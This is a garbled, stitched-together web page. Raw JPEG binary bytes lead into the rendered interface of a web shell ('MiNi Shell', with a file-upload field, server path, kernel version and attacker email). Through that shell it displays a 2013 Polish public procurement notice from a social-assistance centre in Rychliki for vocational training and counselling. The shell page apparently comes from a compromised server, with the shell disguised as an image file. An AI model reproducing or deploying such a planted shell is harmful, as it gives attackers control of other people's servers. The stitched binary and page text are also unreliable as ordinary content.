JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130619/117977-N-2013.html

<p class="kh_header"><b>Rychliki: Przeprowadzenie szkoleń i doradztwa indywidualnego w ramach projektu pn. Praca nie męka-przyszłość w Twoich rękach realizowanego przez Gminny Ośrodek Pomocy Społecznej w Rychlikach  współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 117977 - 2013; data zamieszczenia: 19.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Rychlikach , 14-400 Rychliki, woj. warmińsko-mazurskie, tel. 55 248 84 73, faks 55 248 84 73.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> rychliki-ug.bip-wm.pl/pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> rychliki-ug.bip-wm.pl/pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminny Ośrodek Pomocy Społecznej w Rychlikach.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń i doradztwa indywidualnego w ramach projektu pn. Praca nie męka-przyszłość w Twoich rękach realizowanego przez Gminny Ośrodek Pomocy Społecznej w Rychlikach  współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest przeprowadzenie szkoleń i doradztwa indywidualnego, szkoleń zawodowych, oraz praktyk zawodowych zawierających się w zadaniu Aktywna Integracja w ramach projektu pn. Praca nie męka-przyszłość w Twoich rękach, realizowanego przez Gminny Ośrodek Pomocy Społecznej w Rychlikach współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. 
Zasady ogólne organizacji szkolenia:Zamawiający zapewnia salę szkoleniową, zlokalizowaną na terenie Rychlik. Wykonawca wyposaży wszystkich uczestników szkolenia w materiały biurowe, piśmiennicze ,w tym co najmniej długopis, zeszyt, notatnik do każdych zajęć, merytoryczne opracowania omawianych zagadnień, ubrania robocze na kursy zawodowe - tam gdzie są niezbędne.Wykonawca w 2014r. pokryje koszty dojazdów, dopuszczalne jest zorganizowanie transportu, dla 19 uczestników szkoleń zawodowych z miejscowości Rychliki do miejsca odbywania praktyk zawodowych. Wykonawca zapewni kadrę posiadająca wymagane wykształcenie, kwalifikacje  i doświadczenie zawodowe, odpowiednie do rodzaju prowadzonego kształcenia oraz w prowadzeniu szkoleń zawodowych związanych z przedmiotem zamówienia. Przedmiot zamówienia zostanie zrealizowany na wysokim poziomie, umożliwiającym zdobycie wiedzy teoretycznej i praktycznych umiejętności uczestników szkolenia. Wykonawca zapewnia poczęstunek w trakcie zajęć grupowych który musi składać się z min. ciepłego dania obiadowego dla każdego z uczestników,w przypadku zajęć trwających 6 godzin dydaktycznych, 30 gramowej porcji ciastek, 250 ml herbaty,kawy, 250 ml wody mineralnej i 250 ml soku.
Wykonawca zapewnia: wydanie zaświadczeń o ukończeniu zajęć z doradcą zawodowym przez Uczestników oraz Indywidualnych Planów Działania.
Zajęcia będą odbywać się w dni powszednie ,poza sobotą  i niedzielą, w godzinach porannych od godziny 8:00. Harmonogram zajęć zostanie ostatecznie zatwierdzony przez Zamawiającego. Wykonawca sfinansuje, niezbędne badania lekarskie przed rozpoczęciem kursu zawodowego. Wykonawca po zakończeniu zajęć przedłoży Zamawiającemu indywidualną pisemną opinię doradcy zawodowego, psychologa, wizażysty, pielęgniarki, prowadzącego zajęcia dotyczącą każdego uczestnika z zaznaczeniem, w jakim zakresie udział w zajęciach wpłynął pozytywnie na uczestnika ,aktywność na zajęciach, praca indywidualna, praca w grupie, umiejętności, kreatywność, innowacyjność, itp; wraz z wypełnionym dziennikiem zajęć,praktyk z zaznaczoną obecnością na zajęciach uczestników szkolenia, oraz przeprowadzi badania ewaluacyjne ;np. w postaci ankiet; określające poziom osiągnięcia wskaźników pomiaru celu w projekcie, Liczba osób, u których wzrosły kwalifikacje zawodowe, Liczba osób, która ukończy kurs zawodowy Wykonawca po zakończeniu zajęć praktycznych przedłoży Zamawiającemu indywidualną pisemną opinię prowadzącego zajęcia praktyczne dotyczącą każdego uczestnika z zaznaczeniem, w jakim zakresie udział w zajęciach wpłynął pozytywnie na uczestnika ,aktywność na zajęciach, praca indywidualna, praca w grupie, umiejętności, kreatywność, innowacyjność, itp. wraz z wypełnionym dziennikiem zajęć z zaznaczoną obecnością na zajęciach uczestników praktyk. Na zakończenie kursu zawodowego każdy uczestnik otrzyma imienne zaświadczenie ,certyfikat; potwierdzający zdobyte umiejętności zawodowe oraz zaświadczenie,certyfikat potwierdzające udział w szkoleniu finansowanym ze środków Unii Europejskiej. Wykonawca zobowiązuje się współpracować z Zamawiającym na każdym etapie realizacji kursu zawodowego, w szczególności w zakresie ustalania dokładnego harmonogramu zajęć, informowania o poziomie realizacji szkolenia, frekwencji uczestników. Wykonawca będzie dokumentował realizację szkoleń poprzez:program i harmonogram szkolenia
imienną listę obecności, listę odbioru cateringu, listę potwierdzająca odbiór materiałów szkoleniowych,dziennik zajęć,rejestr wydanych zaświadczeń,
listę potwierdzających odbiór zaświadczeń,certyfikatów,raport końcowy zrealizowanych szkoleń wraz ankietami,Oryginały dokumentów Wykonawca przekaże Zamawiającemu niezwłocznie po zakończeniu szkolenia. Dodatkowo Wykonawca prowadzić będzie dokumentację księgową szkolenia w postaci: faktur zakupu, umów zlecenia, rachunków poświadczających poniesione wydatki przechowywanych przez Wykonawcę Wykonawca przestrzegać będzie Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki w szczególności w zakresie oznaczania dokumentacji potwierdzającej właściwą realizację zadania oraz informowania Uczestników o współfinansowaniu szkoleń ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego . Wykonawca zobowiązuje się do złożenia do Zamawiającego, w przypadku zmiany statusu prawnego, upadłości lub likwidacji działalności gospodarczej, oryginałów dokumentacji związanej z realizacją usługi lub poinformowania o miejscu archiwizacji. Zasady szczególne organizacji kursu
Zajęcia grupowe z doradcą zawodowym Zajęcia  grupowe - dla grupy 28 osób w wieku od 15 do 60 lat,  obejmujące  26 godziny dydaktyczne ;1 godzina dydaktyczna to 45 minut. Prowadzone zajęcia grupowe winny zawierać następujące bloki tematyczne:komunikacja interpersonalna ;komunikacja werbalna i mechanizm komunikacji, umiejętności komunikacyjne a efektywność, komunikacja niewerbalna - wizerunek, gest, pozycja ciała, spojrzenie, organizacja otoczenia, wyrażanie emocji, zachowania ciepłe i zimne, bariery w komunikacji, asertywność koncepcja zachowań asertywnych: pojęcie asertywności, sztuka aktywnego słuchania, jako podstawa asertywności, typy zachowań: zachowania agresywne, uległe, asertywne, umiejętności odmawiania i przyjmowania odmowy, umiejętności argumentowania, obrona przed manipulacją, przyjmowanie ocen negatywnych i pozytywnych, reagowanie na formy krytyki, udzielanie konstruktywnej informacji zwrotnej, jak zachować asertywność w kontaktach z trudnymi ludźmi, panowanie nad stresem i emocjami w kontaktach z ludźmi, autoprezentacja w grupie rówieśniczej i przed pracodawcą ,rola wyglądu, zachowania, budowanie wizerunku, najczęstsze błędy popełniane podczas rozmów z pracodawcą,błędy i porażki ,porażki jako naturalny element życia, analiza niepowodzeń, korzyści wynikające z poniesionych porażek, ustrzeganie się przed ponownym dokonaniem błędu, pozytywne myślenie,
nabycie umiejętności pracy  grupowej, poruszanie się na rynku pracy,
trening umiejętności psychospołecznych, motywację do podejmowania zmian życiowych.  Zajęcia grupowe z doradztwa zawodowego  zostaną przeprowadzone w terminie od czerwca 2013r.do 31 sierpnia 2013 roku. Indywidualne doradztwo zawodowe - określenie  predyspozycji Zawodowych, utworzenie Indywidualnego Planu Działania W ramach tej części zamówienia Wykonawca przeprowadzi 3 godzinne 
indywidualne zajęcia doradcze dla 28 Uczestników w wieku od 15 do 60 lat, łącznie 84 godziny indywidualnych konsultacji gdzie1 godzina dydaktyczna to 60min.
Indywidualne doradztwo będzie zawierało następujące elementy dotyczące 
równości szans kobiet i mężczyzn:określenie zawodów, w których występuje niedoreprezentowanie kobiet,korzyści i zagrożenia wynikające z podejmowania zawodów typowo kobiecych i typowo męskich,określenie predyspozycji zawodowych,
doradztwo edukacyjne.Efektem końcowym indywidualnego doradztwa będzie utworzenie przez doradcę zawodowego Indywidualnego Planu Działania,
Indywidualne doradztwo będzie realizowane w terminie od czerwca 2013r.do 30 października 2013 roku,Zajęcia grupowe z psychologiem Zajęcia  grupowe - dla grupy 28 osób w wieku od 15 do 60 lat,  obejmujące  24 godziny dydaktyczne ,gdzie 1 godzina dydaktyczna to 45 minut. Prowadzone zajęcia grupowe winny zawierać następujące bloki tematyczne:nabywanie umiejętności radzenia sobie w sytuacjach trudnych,motywacja do podejmowania zmian w życiu,praca w grupie.
Zajęcia grupowe z psychologiem będą realizowane w terminie od lipca 2013r. do 
30 września 2013 roku,Indywidualne konsultacje z psychologiem W ramach tej części zamówienia Wykonawca przeprowadzi 2 godzinne indywidualne konsultacje dla 28 Uczestników w wieku od 15 do 60 lat, łącznie 56 godzin indywidualnych konsultacji, 1 godzina konsultacji to 60 minut.Efektem końcowym indywidualnych konsultacji będzie utworzenie przez Psychologa Kart udzielonej konsultacji,Indywidualne konsultacje będą realizowane w terminie od września 2013r. do 30 listopada 2013 roku,
Indywidualne konsultacje będą dotyczyły: asertywności, radzenia sobie w sytuacjach trudnych, zapobiegania i radzenia sobie ze stresem, motywacji do podejmowania pozytywnych zmian w życiu.Zajęcia grupowe z wizażystą Zajęcia  grupowe  dla grupy 28 osób w wieku od 15 do 60 lat,  obejmujące  20 godzin dydaktycznych,1 godzina dydaktyczna to 45 minut. Prowadzone zajęcia grupowe winny zawierać zagadnienia związane z poprawą wizerunku osobistego, podwyższeniem samooceny,
Zajęcia grupowe z wizażystą będą realizowane w terminie od września 2013r.do 
30 listopada 2013 roku, Zajęcia grupowe z pielęgniarką
Zajęcia  grupowe - dla grupy 28 osób w wieku od 15 do 60 lat,  obejmujące  10 godzin dydaktycznych,gdzie 1 godzina dydaktyczna to 45 minut. Prowadzone zajęcia grupowe winny zawierać zagadnienia związane z udzielaniem pierwszej pomocy przedlekarskiej, profilaktyką uzależnień,Zajęcia grupowe z pielęgniarką będą realizowane w terminie od października 2013r.do 30 listopada 2013 roku,
Szkolenia zawodowe :warsztaty teoretyczne :Przedstawiciel handlowy z prawem jazdy kategorii B Zajęcia  teoretyczne i praktyczne w zawodzie przedstawiciel handlowy z prawem jazdy kategorii B , dla grupy 9 osób w wieku od 15 do 60 lat,  obejmujące  150 godziny dydaktyczne , gdzie 1 godzina dydaktyczna to 45 minut,
Prowadzone zajęcia grupowe winny być realizowane według programu 
zatwierdzonego przez Zamawiającego, Zajęcia grupowe będą realizowane w terminie od stycznia 2014r.do 31 maja 2014roku,Mechanik samochodowy
Zajęcia  teoretyczne i praktyczne w zawodzie mechanik samochodowy- dla 
grupy 3 osób w wieku od 15 do 60 lat,  obejmujące  150 godziny dydaktyczne 
1godzina dydaktyczna to  45 minut,Zajęcia grupowe będą realizowane w terminie od stycznia 2014r. do 31 maja 2014 roku,Fryzjer zajęcia  teoretyczne i praktyczne w zawodzie fryzjer- dla grupy 7 osób w wieku od 15 do 60 lat,  obejmujące  150 godziny dydaktyczne ,1 godzina dydaktyczna to 45 minut.
Zajęcia grupowe będą realizowane w terminie od stycznia 2014r. do 31maja 2014  roku,Szkolenia zawodowe: Praktyki zawodowe.
Praktyki zawodowe w ilości 200 godzin dla szkoleń z zakresu: przedstawiciel handlowy z prawem jazdy kategorii B, mechanik samochodowy, fryzjer. Łączna liczba praktyk zawodowych 3 x 200 godzin, tj 600 godzin. Praktyki zawodowe będą realizowane w terminie od maja 2014r.do września 2014 roku,
Zajęcia z zakresu przedsiębiorczości 40 h Zajęcia  grupowe - dla grupy 19 osób w wieku od 15 do 60 lat,  obejmujące  40 godzin dydaktycznych ,1 godzina dydaktyczna = 45 minut. Prowadzone zajęcia grupowe winny zawierać zagadnienia związane z przedsiębiorczością, prowadzeniem działalności gospodarczej, samozatrudnieniem, ekonomią społeczną, zakładaniem spółdzielni socjalnych oraz przedsiębiorczością na terenach wiejskich,Zajęcia grupowe z przedsiębiorczości będą realizowane w terminie od  października 2014r. do 30 listopada 2014 roku.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.80.00.00-9, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> brak</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie, w którym oświadczy, iż posiada odpowiednie uprawnienia jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie o zrealizowaniu w okresie ostatnich trzech lat lub krótszym minimum jedną usługę proporcjonalną pod względem ilości uczestników do części zamówienia, na którą składa ofertę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy do do oferty oświadczenie, z którego będzie wynikało, że Wykonawca dysponuje co najmniej jedną osobą która posiada uprawnienia doradcy zawodowego i posiada doświadczenie polegające na tworzeniu Indywidualnych Planów działania.Wykonawca dysponuje co najmniej jedną osobą, która jest psychologiem oraz posiada doświadczenie w prowadzeniu indywidualnych konsultacji.
Wykonawca dysponuje co najmniej jedną osobą, która jest wizażystą oraz posiada doświadczenie zawodowe.Wykonawca dysponuje co najmniej jedną osobą, która jest pielęgniarką  oraz posiada doświadczenie zawodowe.Wykonawca dysponuje kadrą, która posiada odpowiednie uprawnienia do przeprowadzenia zajęć,szkoleń według zatwierdzonego przez Zamawiającego programu w zawodach przedstawiciel handlowy z prawem jazdy kategorii B, mechanik samochodowy, fryzjer.Wykonawca dysponuje kadrą, która posiada uprawnienia do przeprowadzenia praktyk zawodowych według zatwierdzonego przez Zamawiającego programu w zawodach przedstawiciel handlowy z prawem jazdy kategorii B, mechanik samochodowy, fryzjer.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie na podstawie art 22 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - sposób realizacji zadania - 25</li>
<li>3 - doświadczenie - 25</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> rychliki-ug.bip-wm.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Rychlikach, 14-411 Rychliki104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2013 godzina 12:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Rychlikach, 14-411 Rychliki 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany przez Gminny Ośrodek pomocy Społecznej w Rychlikach współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach programu operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com